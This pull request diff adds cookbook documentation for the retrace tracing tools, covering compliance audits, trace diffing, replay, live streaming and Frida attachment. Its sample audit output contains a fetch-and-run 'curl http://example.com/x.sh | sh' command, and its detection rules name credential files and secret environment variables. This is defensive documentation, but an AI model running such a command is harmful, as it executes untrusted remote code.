### PR TITLE
release: v2.3.3 — tool ecosystem cookbook + tools.md overview

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,30 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html)
 (see `docs/adr/0006-semantic-versioning.md`).
 
+## [2.3.3] - 2026-08-13
+
+### Added
+- Nine cookbook recipes for the v2.3.0 tool ecosystem:
+  - [24 — Audit a trace for compliance violations](docs/cookbook/24-audit-compliance.md) (`retrace-audit`).
+  - [25 — Detect performance regressions between two builds](docs/cookbook/25-diff-regression.md) (`retrace-diff` with `--threshold` and `--stats`).
+  - [26 — Diff the call-order between two runs](docs/cookbook/26-diff-call-order.md) (`retrace-diff --order` LCS).
+  - [27 — Time-travel replay for a trace](docs/cookbook/27-replay-debug.md) (`retrace-replay`).
+  - [28 — Live-stream a trace over WebSocket](docs/cookbook/28-live-stream.md) (`retrace-ws`).
+  - [29 — Trace an iOS / static / running process via Frida](docs/cookbook/29-frida-bridge.md).
+  - [30 — System-wide file-access tracing with eBPF](docs/cookbook/30-ebpf-system.md).
+  - [31 — Browse a trace in VS Code](docs/cookbook/31-vscode-viewer.md).
+  - [32 — Visualize a trace in Grafana](docs/cookbook/32-grafana-dashboard.md).
+- [`docs/tools.md`](docs/tools.md) — top-level overview of the
+  tools ecosystem with a "when to reach for what" table and per-tool
+  reference linking back to the cookbook.
+- `docs/README.md` updated: new row in the routing table for the
+  tools overview; doc-map reflects the larger cookbook count.
+
+### Changed
+- `docs/cookbook/README.md` — new "Tooling ecosystem" section
+  indexes recipes 24–32 with one-line summaries and direct tool
+  references.
+
 ## [2.3.2] - 2026-08-13
 
 ### Changed

--- a/docs/README.md
+++ b/docs/README.md
@@ -12,7 +12,8 @@ install, quick start, and platform support.
 | Get an answer to a common question | [FAQ](faq.md) — language support, overhead, production use, more |
 | Look up a CLI subcommand or env var | [CLI reference](cli.md) |
 | Look up an action or write a JSON config | [Configuration reference](configuration.md) |
-| Run a specific scenario (trace, fuzz, mock, sandbox) | [Cookbook](cookbook/README.md) — 21 recipes with copy-paste JSON |
+| Run a specific scenario (trace, fuzz, mock, sandbox) | [Cookbook](cookbook/README.md) — 32 recipes with copy-paste JSON |
+| Pick the right standalone tool for a job | [Tools overview](tools.md) — `retrace-audit`, `retrace-diff`, `retrace-replay`, `retrace-ws`, Frida/eBPF bridges, VS Code + Grafana plugins |
 | Contribute, build, test, or debug retrace | [Development guide](development.md) |
 | Understand the engine, backends, and actions | [Architecture](architecture.md) |
 | Add retrace to a Dockerfile or compose stack | [Docker guide](docker.md) |
@@ -29,10 +30,11 @@ docs/
 ├── faq.md                 ← common questions: language support, overhead, etc.
 ├── cli.md                 ← CLI subcommand + env var reference
 ├── configuration.md       ← JSON config schema + action parameter reference
+├── tools.md               ← standalone tooling ecosystem (audit, diff, replay, ws, frida, ebpf, ide plugins)
 ├── development.md         ← building, testing, contributing, debugging retrace
 ├── architecture.md        ← how engine, backends, and actions fit together
 ├── engine-state-machine.md ← per-call lifecycle (engine_wrapper flow)
-├── cookbook/              ← 21 recipe-driven walkthroughs
+├── cookbook/              ← 32 recipe-driven walkthroughs
 │   ├── README.md          ← index + compact action reference
 │   ├── 01-trace-all-calls.md
 │   ├── …

--- a/docs/cookbook/24-audit-compliance.md
+++ b/docs/cookbook/24-audit-compliance.md
@@ -1,0 +1,216 @@
+# 24 — Audit a trace for compliance violations
+
+## Problem
+
+You traced a binary with `retrace run`, and now you need a
+defensible answer to questions like:
+
+- Did it read `/etc/passwd`, `/etc/shadow`, or `~/.ssh/id_rsa`?
+- Did it call `system()` or `popen()` (shell-injection risk)?
+- Did it consult secret env vars (`*_TOKEN`, `*_KEY`, `*_PASSWORD`)?
+- Did it open outbound network connections?
+
+Reading 100K JSON log lines by hand is not the answer. `retrace-audit`
+applies a JSON policy file to the trace and emits a findings report
+in either human-readable JSON or SARIF 2.1.0 (the format GitHub Code
+Scanning, Azure DevOps, and VS Code consume natively).
+
+## Config
+
+Use any retrace config that emits `log_params` for the functions
+the policy cares about. The default wildcard works:
+
+`audit-default.json`:
+
+```json
+{
+  "intercept_scripts": [
+    {
+      "func_name": "*",
+      "actions": [
+        { "action_name": "log_params" },
+        { "action_name": "call_real" }
+      ]
+    }
+  ]
+}
+```
+
+The policy is a separate file. retrace ships four built-in policies
+in `share/policies/`:
+
+| Policy | Rule count | What it flags |
+|--------|-----------|---------------|
+| `baseline.json` | 10 | File access to PII paths, `system()`, env-var leaks |
+| `pci-dss.json` | 12 | PCI-DSS v4.0 control mappings (card data, audit trails) |
+| `hipaa.json` | 12 | HIPAA Security Rule (PHI paths, TLS, auth) |
+| `iso27001.json` | 14 | ISO/IEC 27001:2022 Annex A control mappings |
+
+You can also write your own — the schema is six fields per rule:
+
+```json
+{
+  "name": "my-policy",
+  "rules": [
+    {
+      "id": "CUSTOM-001",
+      "description": "Binary read the JWT signing key",
+      "severity": "critical",
+      "match": { "path_contains": "jwt-signing-key.pem" }
+    }
+  ]
+}
+```
+
+Predicate fields (all optional; missing = wildcard):
+
+- `func_exact` — `message.func` equals this string.
+- `func_prefix` — `message.func` starts with this string.
+- `path_contains` — any string value in `message` contains this substring.
+- `env_pattern` — glob match against `message.name` for getenv calls
+  (`*_TOKEN`, `LD_*`, exact name).
+
+A rule matches when ALL of its non-NULL constraints match (AND).
+
+## Invocation
+
+### 1. Capture a trace
+
+```sh
+$ retrace run --config cookbook/audit-default.json \
+    --log /tmp/trace.json \
+    -- /usr/local/bin/sketchy-installer
+```
+
+### 2. Run the audit
+
+```sh
+$ retrace-audit \
+    --policy share/policies/baseline.json \
+    --trace /tmp/trace.json \
+    --format default
+```
+
+### 3. Emit SARIF for GitHub Code Scanning
+
+```sh
+$ retrace-audit \
+    --policy share/policies/pci-dss.json \
+    --trace /tmp/trace.json \
+    --format sarif \
+    -o findings.sarif
+```
+
+Upload `findings.sarif` as a SARIF artifact to GitHub and the
+findings show up in the repo's Security > Code scanning alerts UI
+with file/line references and rule metadata.
+
+## Expected output
+
+`default` format is human-readable JSON:
+
+```json
+{
+  "policy": "baseline",
+  "summary": {
+    "total_entries": 4823,
+    "findings": 7,
+    "by_severity": {"critical": 1, "high": 3, "medium": 2, "info": 1}
+  },
+  "findings": [
+    {
+      "rule_id": "BL-007",
+      "severity": "critical",
+      "description": "Process called system() — shell injection risk",
+      "entry_index": 1247,
+      "entry": { "time": 1785400000, "func": "system",
+                 "args": { "command": "curl http://example.com/x.sh | sh" } }
+    },
+    ...
+  ]
+}
+```
+
+Each finding includes the rule ID, severity, description, the index
+into the original trace, and the full log entry that triggered it
+(for evidence).
+
+## Variations
+
+### Chain multiple policies
+
+Run each policy separately and concatenate the SARIF outputs:
+
+```sh
+for p in baseline pci-dss hipaa iso27001; do
+  retrace-audit \
+    --policy share/policies/$p.json \
+    --trace /tmp/trace.json \
+    --format sarif \
+    -o findings-$p.sarif
+done
+```
+
+GitHub accepts multiple SARIF uploads per repo, categorized by
+policy name.
+
+### Generate a PDF report for offline review
+
+```sh
+$ retrace-audit \
+    --policy share/policies/hipaa.json \
+    --trace /tmp/trace.json \
+    --format pdf \
+    -o hipaa-audit.pdf
+```
+
+The PDF includes a cover page, executive summary, and one page per
+finding (capped at 40 per page) with the rule description and
+matching log entry.
+
+### Write a custom policy for your codebase
+
+Create `share/policies/myteam.json`:
+
+```json
+{
+  "name": "myteam-baseline",
+  "rules": [
+    {
+      "id": "TEAM-001",
+      "description": "Read the production DB password file",
+      "severity": "critical",
+      "match": { "path_contains": "/etc/myteam/db-prod.env" }
+    },
+    {
+      "id": "TEAM-002",
+      "description": "Outbound connect to non-corporate host",
+      "severity": "high",
+      "match": { "func_exact": "connect" }
+    }
+  ]
+}
+```
+
+Install it next to the built-in policies:
+
+```sh
+$ sudo cp myteam.json /usr/local/share/retrace/policies/
+```
+
+## Caveats
+
+- `path_contains` is a substring match (case-sensitive). For
+  regex-based predicates, wait for the filter DSL (TODO.complete/20).
+- The matcher scans every string value in each log entry. Traces
+  with very large string args (e.g. base64 blobs) may take longer.
+- SARIF output includes the full log entry as evidence; large traces
+  produce large SARIF files. Filter the trace with
+  `RETRACE_LOGGER_ALLOWED_FUNCS` first if size matters.
+
+## See also
+
+- Recipe 14 — Trace `getenv()` reads (the data behind `*_TOKEN` rules).
+- Recipe 15 — Capture network traffic (the data behind `connect` rules).
+- Recipe 25 — Diff two traces (regression detection for audits).
+- `docs/adr/` — policy schema and severity-mapping decisions.

--- a/docs/cookbook/25-diff-regression.md
+++ b/docs/cookbook/25-diff-regression.md
@@ -1,0 +1,177 @@
+# 25 — Detect performance regressions between two builds
+
+## Problem
+
+You shipped a PR. CI passed. Now users report your binary is 30%
+slower. You have yesterday's "good" trace and today's "bad" trace;
+reading both side-by-side isn't scaling.
+
+`retrace-diff` reads two retrace traces, groups calls by function,
+and prints a structured diff of call counts and total time. With
+`--threshold pct=N` you can suppress noise (functions that changed
+by less than N%) so the report flags only changes worth looking at.
+The exit code doubles as a CI gate: 0 = no diff, 1 = diff above
+threshold, 2 = error.
+
+## Config
+
+Use the default wildcard config — you need `call_duration_us` for
+every function, which `log_params` emits by default:
+
+`diff-default.json`:
+
+```json
+{
+  "intercept_scripts": [
+    {
+      "func_name": "*",
+      "actions": [
+        { "action_name": "log_params" },
+        { "action_name": "call_real" }
+      ]
+    }
+  ]
+}
+```
+
+## Invocation
+
+### 1. Capture the baseline (good) trace
+
+```sh
+$ git checkout v1.4.2  # last known good
+$ cmake --build build && retrace run \
+    --config cookbook/diff-default.json \
+    --log /tmp/before.json \
+    -- ./build/your-binary input.bin
+```
+
+### 2. Capture the candidate (after) trace
+
+```sh
+$ git checkout my-feature-branch
+$ cmake --build build && retrace run \
+    --config cookbook/diff-default.json \
+    --log /tmp/after.json \
+    -- ./build/your-binary input.bin
+```
+
+### 3. Run the diff
+
+```sh
+$ retrace-diff /tmp/before.json /tmp/after.json
+
+function: malloc
+  count:      before=1247, after=1532  (+285, +22.8%)
+  total time: before=8.3ms, after=11.9ms (+3.6ms, +43.4%)
+
+function: open
+  absent in before; 3 calls in after
+
+function: pthread_mutex_lock
+  count:      before=42000, after=42103  (+103, +0.2%)
+  total time: before=15.1ms, after=15.2ms (+0.1ms, +0.7%)
+```
+
+### 4. CI gating with a threshold
+
+Suppress everything below 10% so noise (mutex locks, time()) falls
+out of the report:
+
+```sh
+$ retrace-diff --threshold pct=10 /tmp/before.json /tmp/after.json
+function: malloc
+  count:      before=1247, after=1532  (+22.8%)
+  total time: before=8.3ms, after=11.9ms (+43.4%)
+$ echo $?
+1
+```
+
+Exit code 1 means "diff found above threshold" — wire it into CI:
+
+```sh
+#!/bin/bash
+# scripts/check-perf-regression.sh
+retrace-diff --threshold pct=10 /tmp/before.json /tmp/after.json
+rc=$?
+if [ $rc -eq 1 ]; then
+  echo "::error::Performance regression detected (see diff above)"
+  exit 1
+fi
+exit 0
+```
+
+## Expected output
+
+A plain-text report, one block per function whose call count or
+total time changed (or appeared/disappeared). With `--threshold`,
+only functions whose percentage change exceeds N% appear.
+
+Exit codes:
+
+| Code | Meaning |
+|------|---------|
+| 0 | No diff above threshold (CI: pass) |
+| 1 | Diff found above threshold (CI: fail) |
+| 2 | Argument or IO error (CI: fail with bug in the diff setup) |
+
+## Variations
+
+### Statistical significance (--stats)
+
+A single before/after run is noisy. Run the baseline N times to
+establish a distribution, then flag functions whose test run
+deviates by more than N standard deviations:
+
+```sh
+$ for i in 1 2 3 4 5; do
+    retrace run --config cookbook/diff-default.json \
+        --log /tmp/baseline-$i.json -- ./build/your-binary input.bin
+done
+$ retrace run --config cookbook/diff-default.json \
+    --log /tmp/test.json -- ./build/your-binary input.bin
+
+$ retrace-diff --stats /tmp/baseline-1.json,/tmp/baseline-2.json,/tmp/baseline-3.json,/tmp/baseline-4.json,/tmp/baseline-5.json /tmp/test.json
+function: malloc
+  baseline: mean=1245.2, stddev=12.4 (n=5)
+  test:     1532
+  z-score:  +23.1  (significantly higher; ~99.99% confidence)
+
+function: open
+  baseline: mean=11.0, stddev=0.0 (n=5)
+  test:     11
+  z-score:  0.0  (no change)
+```
+
+Tune the z-score threshold with `--zscore N` (default 2.0, ~95%
+confidence).
+
+### One-shot diff after a trace pair
+
+Skip the file intermediary when both runs go through the same shell:
+
+```sh
+$ diff <(retrace run --config cookbook/diff-default.json -- ./old-binary \
+          2>&1 >/dev/null) \
+      <(retrace run --config cookbook/diff-default.json -- ./new-binary \
+          2>&1 >/dev/null)
+```
+
+(Use the file-based approach for CI — it's easier to debug.)
+
+## Caveats
+
+- Total-time comparisons assume the same machine and similar load.
+  For CI, pin to dedicated runners and warm up the page cache
+  before each run.
+- The diff is by function name, not by call site. Two call sites of
+  the same function aggregate together; use recipe 17 (per-return-
+  address routing) if you need finer granularity.
+- `--stats` needs at least 2 baseline files to compute stddev;
+  fewer and it falls back to "any change is significant".
+
+## See also
+
+- Recipe 04 — Time each call (for the underlying timing data).
+- Recipe 26 — Call-order diff (`--order`, the LCS-based variant).
+- Recipe 19 — CI fuzzing (a different CI pattern: bug-finding, not regression).

--- a/docs/cookbook/26-diff-call-order.md
+++ b/docs/cookbook/26-diff-call-order.md
@@ -1,0 +1,136 @@
+# 26 — Diff the call-order between two runs
+
+## Problem
+
+Same function call counts. Same total time. But the program behaves
+differently. The issue is order — one run does `open → read → close`
+and the other does `open → close → read`. Per-function aggregation
+hides this.
+
+`retrace-diff --order` runs a longest-common-subsequence (LCS) diff
+across the call sequence (not the per-function stats). Output looks
+like `git diff` for traces: lines marked ` ` (both), `<` (only
+before), `>` (only after). Same exit-code contract as the basic
+diff (0/1/2).
+
+## Config
+
+The default wildcard config works. You don't need `call_duration_us`
+for the order diff (only `message.func`), but mixing both gives a
+single config that works for both diff modes:
+
+`diff-default.json`:
+
+```json
+{
+  "intercept_scripts": [
+    {
+      "func_name": "*",
+      "actions": [
+        { "action_name": "log_params" },
+        { "action_name": "call_real" }
+      ]
+    }
+  ]
+}
+```
+
+## Invocation
+
+### 1. Capture both traces
+
+```sh
+$ retrace run --config cookbook/diff-default.json \
+    --log /tmp/before.json -- ./your-binary input-a.bin
+$ retrace run --config cookbook/diff-default.json \
+    --log /tmp/after.json  -- ./your-binary input-b.bin
+```
+
+### 2. Run the order diff
+
+```sh
+$ retrace-diff --order /tmp/before.json /tmp/after.json
+  open    path=/etc/foo.conf
+  read    fd=3
+< write   fd=3  buf="deprecated branch"
+  read    fd=3
+> fstat   fd=3
+  close   fd=3
+```
+
+Interpretation:
+
+- ` ` (space) — call appears in both, in the same relative order.
+- `<` — appears only in the before trace (input-a triggered a code
+  path that the after trace did not).
+- `>` — appears only in the after trace.
+
+### 3. Combine order + threshold for CI gating
+
+```sh
+$ retrace-diff --order --threshold pct=5 \
+    /tmp/before.json /tmp/after.json
+$ echo $?
+1   # CI: fail when the order diverges meaningfully
+```
+
+## Expected output
+
+A unified-diff-style block showing the LCS alignment of the two
+call sequences. Each line is one call, prefixed with the alignment
+marker.
+
+## Variations
+
+### Filter to a subset of functions
+
+Pre-filter the trace with `jq` to restrict the LCS to just the
+calls you care about (e.g. only `open`/`read`/`write`/`close`):
+
+```sh
+$ jq -c 'select(.message.func == "open" or .message.func == "read" or
+                .message.func == "write" or .message.func == "close")' \
+    /tmp/before.json > /tmp/before-iopc.json
+# (repeat for /tmp/after.json)
+$ retrace-diff --order /tmp/before-iopc.json /tmp/after-iopc.json
+```
+
+This is sharper than running the full LCS on a noisy trace —
+parsing/decoding calls that always happen in deterministic order
+drown out the IO pattern.
+
+### Compare against a golden trace
+
+Check in a "golden" trace and run the order diff on every PR:
+
+```sh
+# .github/workflows/trace-regression.yml
+- name: Compare trace against golden
+  run: |
+    retrace run --config cookbook/diff-default.json \
+        --log /tmp/candidate.json -- ./build/your-binary test-input
+    retrace-diff --order test/golden.json /tmp/candidate.json
+```
+
+Fail the job on any divergence — order changes are often the
+signature of a behavior change that stats-only diff misses.
+
+## Caveats
+
+- LCS is `O(n*m)` in trace length. For traces over ~50K calls
+  each, restrict to a function subset first (see Variations).
+- The diff is on call identity (function name + same call index
+  in the matching run), not on arguments. Two `open("/etc/a")`
+  calls and two `open("/etc/b")` calls align by name only.
+- Engine-noise entries (those with `message.text` instead of
+  `message.func`) are filtered out before the LCS — they don't
+  represent real intercepted calls.
+
+## See also
+
+- Recipe 25 — Performance regression diff (the per-function stats
+  variant; use both together).
+- Recipe 17 — Per-return-address routing (when the same function
+  needs different behavior at different call sites).
+- Recipe 24 — Audit a trace (run a policy over either trace to
+  explain why the order differs).

--- a/docs/cookbook/27-replay-debug.md
+++ b/docs/cookbook/27-replay-debug.md
@@ -1,0 +1,148 @@
+# 27 — Time-travel replay for a trace
+
+## Problem
+
+You captured a 10K-line trace and you're grep'ing through JSON to
+reconstruct what the binary did. The function names and arguments
+are there, but the control flow is hard to see — you can't easily
+"step" forward and backward, can't rewind to a specific call, can't
+search forward to the next call that matches a pattern.
+
+`retrace-replay` is an interactive TUI for traces: read the trace,
+then step forward and backward, jump to any index, list nearby
+calls, and search forward by regex. Like `gdb` for libc-call traces.
+
+## Config
+
+The replay tool works with any retrace trace. Use the default
+wildcard config:
+
+`replay-default.json`:
+
+```json
+{
+  "intercept_scripts": [
+    {
+      "func_name": "*",
+      "actions": [
+        { "action_name": "log_params" },
+        { "action_name": "call_real" }
+      ]
+    }
+  ]
+}
+```
+
+## Invocation
+
+### 1. Capture the trace
+
+```sh
+$ retrace run --config cookbook/replay-default.json \
+    --log /tmp/trace.json -- ./your-binary args...
+```
+
+### 2. Open it in replay
+
+```sh
+$ retrace-replay /tmp/trace.json
+[retrace-replay] loaded 4823 events from /tmp/trace.json
+> l
+  #0    func=opendir     args={ name: "." }
+  #1    func=readdir     args={ dirp: 0x7f... }
+  #2    func=readdir     args={ dirp: 0x7f... }
+  #3    func=closedir    args={ dirp: 0x7f... }
+  #4    func=malloc      args={ size: 4096 }
+  ...
+> n
+#4  func=malloc   args={ size: 4096 }
+     retval=0x7f8a40000000   duration=2us
+> f open
+#7  func=open     args={ path: "/etc/passwd", flags: 0 }
+     retval=3   duration=15us
+> 1247
+#1247  func=system   args={ command: "curl http://..." }
+       retval=0   duration=1234567us
+> p
+#1246  func=getenv   args={ name: "PATH" }
+       retval="/usr/local/bin:/usr/bin:..."
+> q
+```
+
+### 3. Pipe to a script for batch navigation
+
+`retrace-replay` is interactive, but you can drive it from stdin:
+
+```sh
+$ printf 'f open\nn\nn\nq\n' | retrace-replay /tmp/trace.json
+```
+
+Use this to extract a single event for a downstream script.
+
+## Expected output
+
+Each event display includes:
+
+- Event index (`#N`).
+- `func` name and parsed args (JSON object).
+- Return value (raw pointer/int) and `call_duration_us`.
+
+The prompt accepts the commands in the next section.
+
+## Variations
+
+### Command reference
+
+| Key | Effect |
+|-----|--------|
+| `n` or Enter | Next event forward |
+| `p` | Previous event (rewind) |
+| `N` | Next 10 events |
+| `<number>` | Jump to event index N |
+| `l` | List next 10 events |
+| `f <regex>` | Forward to next event whose func or args match |
+| `q` | Quit |
+
+### Surface captured-memory entries
+
+If your trace includes `capture_buffer:` entries (recipe 22's
+post-call memory observation), they show up as `captured:` lines
+under their parent call:
+
+```
+#7  func=recv    args={ fd: 3, len: 4096 }
+     captured: 47 45 54 20 2f 20 48 54 54 50 ... ("GET / HTTP...")
+     retval=1024   duration=423us
+```
+
+### Combine with audit findings
+
+Run `retrace-audit` first to get the entry indices of any
+violations, then jump straight to those events in replay:
+
+```sh
+$ retrace-audit --policy share/policies/baseline.json \
+    --trace /tmp/trace.json --format default \
+    | jq '.findings[].entry_index'
+1247
+3081
+4223
+$ retrace-replay /tmp/trace.json
+> 1247
+#1247  func=system   ...
+```
+
+## Caveats
+
+- The full log is read into memory. Sufficient for typical retrace
+  runs (<1M events). For larger, swap to `tail -n +N | jq` first.
+- Replay reads the file once at start; it doesn't watch for new
+  entries. For live streaming, see recipe 28 (WebSocket streamer).
+- The regex search is forward-only. To search backward, jump to a
+  later index first and walk back with `p`.
+
+## See also
+
+- Recipe 22 — Decode HTTP/DNS (makes captured buffers readable).
+- Recipe 24 — Audit a trace (find the entry indices worth jumping to).
+- Recipe 28 — Live streaming (when you can't wait for the trace to finish).

--- a/docs/cookbook/28-live-stream.md
+++ b/docs/cookbook/28-live-stream.md
@@ -1,0 +1,164 @@
+# 28 — Live-stream a trace over WebSocket
+
+## Problem
+
+You're tracing a long-running server. The JSON log file is on disk
+and growing, but you can't see what's happening right now without
+`tail -f | jq` in a second terminal — and that's just you. You
+want a live dashboard that anyone on the team can open in a browser,
+or a programmatic client that reacts to events as they happen.
+
+`retrace-ws` tails the JSON log file written by `retrace run`,
+parses each entry as it lands, and broadcasts it over WebSocket to
+every connected client. A built-in browser viewer is served at
+`http://localhost:8765/` — zero-client-setup observability.
+
+## Config
+
+Any retrace config works. For live streaming you typically want
+the lock-free logger (default since v2.3.0) and a focused set of
+functions, because at high event rates the network becomes the
+bottleneck:
+
+`ws-net-only.json`:
+
+```json
+{
+  "intercept_scripts": [
+    { "func_name": "connect", "actions": [
+        { "action_name": "log_params" },
+        { "action_name": "call_real" } ] },
+    { "func_name": "send",    "actions": [
+        { "action_name": "log_params" },
+        { "action_name": "call_real" } ] },
+    { "func_name": "recv",    "actions": [
+        { "action_name": "log_params" },
+        { "action_name": "call_real" } ] }
+  ]
+}
+```
+
+## Invocation
+
+### 1. Start retrace-ws (it watches the file)
+
+```sh
+$ retrace-ws /tmp/trace.json
+[retrace-ws] listening on ws://localhost:8765
+[retrace-ws] viewer: http://localhost:8765/
+[retrace-ws] tailing /tmp/trace.json...
+```
+
+### 2. In another terminal, run retrace against the same file
+
+```sh
+$ retrace run \
+    --config cookbook/ws-net-only.json \
+    --log /tmp/trace.json \
+    -- ./your-server
+```
+
+### 3. Open the viewer (or connect a client)
+
+Open `http://localhost:8765/` in any browser. Events stream in
+real time. Or connect a programmatic client:
+
+```python
+# Python client (websockets library)
+import asyncio, json, websockets
+
+async def main():
+    async with websockets.connect("ws://localhost:8765/stream") as ws:
+        async for msg in ws:
+            entry = json.loads(msg)
+            if entry["message"]["func"] == "connect":
+                print(f"[!] connect to {entry['message']['args']['addr']}")
+
+asyncio.run(main())
+```
+
+```javascript
+// Browser client
+const ws = new WebSocket("ws://localhost:8765/stream");
+ws.onmessage = (e) => {
+  const entry = JSON.parse(e.data);
+  console.log(entry.message.func, entry.message.args);
+};
+```
+
+## Expected output
+
+Each WebSocket message is one JSON object — exactly one entry from
+the retrace log. No array wrapping, no delimiters; clients just
+parse line-by-line (or message-by-message).
+
+The built-in viewer is a single HTML page served at the root URL.
+It auto-connects and pretty-prints events; open it in 2 browsers
+and both get the same stream.
+
+## Variations
+
+### Stream across machines
+
+By default `retrace-ws` binds to localhost. Override with `--host
+0.0.0.0` to expose it (use a tunnel or VPN — there's no auth):
+
+```sh
+$ retrace-ws --host 0.0.0.0 --port 8765 /tmp/trace.json
+```
+
+### Filter at the source
+
+Don't send everything over the wire — restrict the trace up front
+with `RETRACE_LOGGER_ALLOWED_FUNCS`:
+
+```sh
+$ RETRACE_LOGGER_ALLOWED_FUNCS=connect,send,recv \
+    retrace run --config cookbook/ws-net-only.json \
+    --log /tmp/trace.json -- ./your-server
+```
+
+### Pipe into retrace-audit for live alerting
+
+Wire the WebSocket feed into a small Python script that runs audit
+predicates live:
+
+```python
+# live-audit.py
+import asyncio, json, websockets
+
+CRITICAL_PATHS = ["/etc/shadow", "/etc/passwd"]
+
+async def main():
+    async with websockets.connect("ws://localhost:8765/stream") as ws:
+        async for msg in ws:
+            entry = json.loads(msg)
+            args_str = json.dumps(entry.get("message", {}).get("args", {}))
+            if any(p in args_str for p in CRITICAL_PATHS):
+                print(f"[ALERT] {entry['message']['func']} hit {args_str}")
+
+asyncio.run(main())
+```
+
+This is the building block for a real-time SOC2 monitor.
+
+## Caveats
+
+- `retrace-ws` is a Python tool (no native binary). The retrace
+  release tarball ships the script under `tools/ws-stream/`; copy
+  it anywhere in `$PATH`.
+- The viewer uses a single JSON-streaming connection per client.
+  For more than ~10 simultaneous clients, put a real WebSocket
+  reverse proxy (nginx, HAProxy) in front.
+- The streamer uses a brace-counting parser, not `json.loads`, so
+  it can handle partial objects arriving mid-write. But it does
+  assume the log writer emits well-formed entries eventually; if
+  `retrace run` crashes mid-write, the last partial entry is
+  dropped silently.
+
+## See also
+
+- Recipe 23 — Bridge to OpenTelemetry (the batch/postmortem
+  alternative when you don't need live).
+- Recipe 31 — VS Code extension (a richer client for this stream).
+- Recipe 32 — Grafana dashboard (panel-based client for this stream).

--- a/docs/cookbook/29-frida-bridge.md
+++ b/docs/cookbook/29-frida-bridge.md
@@ -1,0 +1,173 @@
+# 29 — Trace an iOS / static / running process via Frida
+
+## Problem
+
+`LD_PRELOAD` doesn't work for your target. Common reasons:
+
+- It's an iOS app (no `DYLD_INSERT_LIBRARIES`).
+- It's a statically-linked Linux binary (no dynamic linker to
+  preload into).
+- It's already running and you can't restart it.
+- It's on Windows and you'd rather use Frida's existing tooling.
+
+You still want a retrace-style call log — args, return values,
+per-function — and you want the output to be consumable by every
+retrace tool (audit, diff, replay, OTLP converter).
+
+`retrace-frida.js` is a Frida script that hooks libc functions and
+emits retrace-compatible JSON. Same output format, same downstream
+tools, different injection mechanism.
+
+## Config
+
+The Frida script's configuration is the `FUNC_LIST` array at the
+top of `frida-bridge/retrace-frida.js`. Edit it in place:
+
+```javascript
+const FUNC_LIST = [
+    { name: "open",    argc: 3, stringArgs: [0] },   // path
+    { name: "openat",  argc: 4, stringArgs: [1] },   // path
+    { name: "read",    argc: 3 },
+    { name: "write",   argc: 3 },
+    { name: "close",   argc: 1 },
+    { name: "connect", argc: 3 },
+    { name: "send",    argc: 4 },
+    { name: "recv",    argc: 4 },
+    { name: "system",  argc: 1, stringArgs: [0] },
+    { name: "getenv",  argc: 1, stringArgs: [0] },
+    // ...add more here
+];
+```
+
+- `argc` — number of arguments the function takes (capped at 8 for
+  the frame).
+- `stringArgs` — 0-based indices of arguments to dereference as C
+  strings (e.g. for `open(path, flags)`, `[0]` reads up to 256
+  bytes at `path` and includes the string in the args array).
+
+## Invocation
+
+### Install Frida
+
+```sh
+$ pip install frida-tools   # or: brew install frida
+```
+
+### Three ways to attach
+
+```sh
+# Attach to a running process by name
+$ frida -l retrace-frida.js -n YourProcess > /tmp/trace.json
+
+# Spawn a fresh process and hook from the start
+$ frida -l retrace-frida.js -f ./your-binary > /tmp/trace.json
+
+# Inject into a process you'll launch separately
+$ frida -l retrace-frida.js -- ./your-binary > /tmp/trace.json
+```
+
+### Run downstream tools
+
+The output is byte-compatible with `retrace run` output. Pipe into
+any retrace tool:
+
+```sh
+$ retrace-audit --policy share/policies/baseline.json \
+    --trace /tmp/trace.json
+$ retrace-replay /tmp/trace.json
+$ cat /tmp/trace.json | retrace-to-otlp > /tmp/spans.json
+```
+
+## Expected output
+
+One JSON object per call, wrapped in `[ ... ]` like retrace's
+native output:
+
+```json
+[
+{"time":1786269481,"module":"FUNCS","severity":"INFO",
+ "message":{"func":"open","args":{"path":"/etc/passwd","flags":0},"ret":3}},
+{"time":1786269481,"module":"FUNCS","severity":"INFO",
+ "message":{"func":"read","args":{"fd":3,"buf":"0x7f...","count":4096},"ret":1024}},
+...
+]
+```
+
+## Variations
+
+### iOS app debugging
+
+`retrace-frida.js` works in `frida-server` on jailbroken iOS and in
+`frida-gadget` embedded in a test build:
+
+```sh
+# On the iOS device (jailbroken): start frida-server
+$ ssh root@iphone "frida-server &"
+
+# From your dev machine: attach to the running app
+$ frida -l retrace-frida.js -U -n YourApp > /tmp/ios-trace.json
+```
+
+The output is the same JSON; `retrace-audit` runs unchanged on
+macOS/Linux against the iOS-gathered trace.
+
+### Static binary on Linux
+
+`LD_PRELOAD` can't hook a static binary. Frida injects via ptrace
+and can:
+
+```sh
+$ file ./your-static-binary
+ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, ...
+
+$ frida -l retrace-frida.js -f ./your-static-binary > /tmp/trace.json
+```
+
+### Attach without restarting the target
+
+The killer feature vs `LD_PRELOAD`:
+
+```sh
+# Target is already running with PID 12345 in production
+$ frida -l retrace-frida.js -p 12345 > /tmp/trace.json
+^C  # detach when done; target keeps running
+```
+
+Use this for incident response — no restart, no deployment, just
+attach and gather.
+
+### Custom function list for a specific investigation
+
+Edit `FUNC_LIST` to focus on what matters. For a crypto audit,
+strip down to just the OpenSSL functions:
+
+```javascript
+const FUNC_LIST = [
+    { name: "SSL_read",        argc: 3 },
+    { name: "SSL_write",       argc: 3 },
+    { name: "SSL_connect",     argc: 1 },
+    { name: "SSL_get_verify_result", argc: 1 },
+    { name: "X509_verify_cert", argc: 1 },
+];
+```
+
+## Caveats
+
+- Frida's overhead is higher than `LD_PRELOAD` (~10x for the hook
+  itself, plus IPC for every call). Don't use Frida for perf
+  measurement — use it for behavioral tracing and security review.
+- `stringArgs` reads up to 256 bytes at the pointer, capped. For
+  variable-length buffers, you'll see truncation; pair with
+  recipe 22 (`capture_buffer` style post-call memory observation)
+  when you need exact lengths.
+- The script doesn't follow child processes by default. Use
+  `frida -f` with `enable_spawn_gating: true` for that.
+- iOS requires a jailbroken device or a test build with
+  `frida-gadget` injected at build time.
+
+## See also
+
+- Recipe 30 — System-wide tracing with eBPF (the kernel-level
+  alternative for Linux observability).
+- Recipe 24 — Audit a trace (works unchanged on Frida output).
+- Recipe 27 — Time-travel replay (works unchanged on Frida output).

--- a/docs/cookbook/30-ebpf-system.md
+++ b/docs/cookbook/30-ebpf-system.md
@@ -1,0 +1,154 @@
